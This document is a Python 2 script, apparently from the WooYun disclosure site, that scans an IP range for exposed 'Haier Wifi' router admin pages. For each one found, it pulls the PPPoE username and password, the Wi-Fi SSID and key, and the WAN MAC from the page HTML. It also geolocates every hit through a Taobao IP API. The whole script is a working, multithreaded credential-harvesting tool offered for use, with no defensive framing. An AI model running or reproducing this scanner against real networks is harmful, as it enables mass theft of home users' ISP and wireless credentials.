WooYun.org

#!/usr/bin/env python
# coding=utf-8
# code by 92ez.com
# last modify time 2015-08-15 13:21
import Queue
from threading import Thread
import time
import re
import sys
import subprocess
import json
import urllib2
#ip to num
def ip2num(ip):
    ip = [int(x) for x in ip.split('.')]
    return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3]
#num to ip
def num2ip(num):
    return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24,
                            (num & 0x00ff0000) >> 16,
                            (num & 0x0000ff00) >> 8,
                            num & 0x000000ff)
#get all ips list between start ip and end ip
def ip_range(start, end):
    return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff]
#main function
def bThread(iplist):
    SETTHREAD = raw_input('Thread: ')
    print '[Note] Running...\n'
    threadl = []
    queue = Queue.Queue()
    hosts = iplist
    for host in hosts:
        queue.put(host)
    threadl = [tThread(queue) for x in xrange(0, int(SETTHREAD))]
    for t in threadl:
        t.start()
    for t in threadl:
        t.join()
#get host position by Taobao API
def getposition(host):
    try:
        ipurl = "http://ip.taobao.com/service/getIpInfo.php?ip="+host
        jsondata = urllib2.urlopen(ipurl).read()
        value = json.loads(jsondata)['data']
        info = [value['country'],value['region'],value['city'],value['isp'] ]
        return info
    except Exception, e:
        print "[Note] Get "+ host+" position failed , will retry ...\n"
        getposition(host)
#create thread
class tThread(Thread):
    def __init__(self, queue):
        Thread.__init__(self)
        self.queue = queue
    def run(self):
        global PORT
        while not self.queue.empty():
            host = self.queue.get()
            try:
                #print host
                checktitle(host,PORT)
            except:
                continue
def checktitle(host,port):
    aimurl = "http://"+host+":"+port
    try:
        f = urllib2.urlopen(aimurl,timeout = 5)
        htmlcontent = f.read()
        f.close()
        title = re.findall(r'<title>(.+?)</title>',htmlcontent)
        
        if title[0].encode('utf8') == "Haier Wifi":
            pppoeusername = re.findall(r'name=\"wan_pppoe_username\" size=\"30\" maxlength=\"128\" value=\"(.+?)\">',htmlcontent)
            pppoeupassword = re.findall(r'name=\"wan_pppoe_passwd\" size=\"30\" maxlength=\"128\" value=\"(.+?)\">',htmlcontent)
            ssid = re.findall(r'var ssid = \'(.+?)\'',htmlcontent)
            key = re.findall(r'var psk = \'(.+?)\'',htmlcontent)
            wanmac = re.findall(r'var factoryWanMac=\"(.+?)\"',htmlcontent)
            posinfo = getposition(host)
            print "Found "+ title[0].encode('utf8') + "\nurl: "+aimurl
            print "pppoeusername: "+pppoeusername[0].encode('utf8')+" pppoeupassword: "+pppoeupassword[0].encode('utf8')
            print "ssid: "+ssid[0]+" key: "+key[0].encode('utf8')
            print "factoryWanMac: "+wanmac[0].encode('utf8')
            print posinfo[0].encode('utf8')+" "+posinfo[1].encode('utf8')+" "+posinfo[2].encode('utf8')+" "+posinfo[3].encode('utf8')+"\n"
            
    except Exception, e:
        pass
if __name__ == '__main__':
    print '\nScan Haier Wifi Router program.\n'
    
    startIp = raw_input('Start IP: ')
    endIp = raw_input('End IP: ')
    port = raw_input('Port: ')
    global PORT
    PORT = port
    iplist = ip_range(startIp, endIp)
    print '\n[Note] Will scan '+str(len(iplist))+" ips...\n"
    bThread(iplist)